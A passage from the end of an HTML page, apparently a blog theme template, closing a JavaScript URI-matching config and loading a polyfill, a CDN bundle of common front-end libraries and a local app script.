        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
